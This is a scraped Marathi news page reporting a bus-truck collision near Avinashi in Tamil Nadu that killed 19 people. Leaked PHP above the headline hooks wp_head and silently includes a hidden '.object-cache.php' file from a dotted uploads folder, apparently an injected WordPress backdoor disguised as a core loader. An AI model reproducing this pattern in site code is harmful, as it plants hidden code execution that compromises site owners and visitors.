add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बस – ट्रकच्या भीषण अपघातात १९ जणांचा मृत्यू – SOCH INDIA
Menu

अपराध समाचार
बस – ट्रकच्या भीषण अपघातात १९ जणांचा मृत्यू

nobanner

तामिळनाडूमधील तिरुपूर जिल्ह्यातील अविनाशी शहराजवळ केरळ राज्य महामंडळाच्या बसचा ट्रकशी भीषण अपघात झाला आहे. ज्यामध्ये आतापर्यंत प्राप्त माहितीनुसार १९ जणांचा मृत्यू झाला आहे. मृतांचा आकडा वाढण्याची भीती वर्तवली जात आहे. तर २० पेक्षा अधिकजण जखमी झाले असल्याचीही माहिती समोर आली आहे.

ही बस कर्नाटकातील बंगळुरूहून केरळमधील एरर्नाकुलमला जात होती. दरम्यान, एका ट्रकशीची तिचा भीषण अपघात झाला. या अपघातातील १९ मृतांमध्ये १४ पुरूष व पाच महिलांचा समावेश आहे.

मृतदेह तिरुपूर येथील स्थानिक शासकीय रुग्णालयात हलवले जात आहेत. अपघाताची माहिती मिळताच स्थानिक पोलीस प्रशासनाने घटनास्थळी धाव घेतली, यानंतर स्थानिकांच्या मदतीने बचावकार्य सुरू झाले.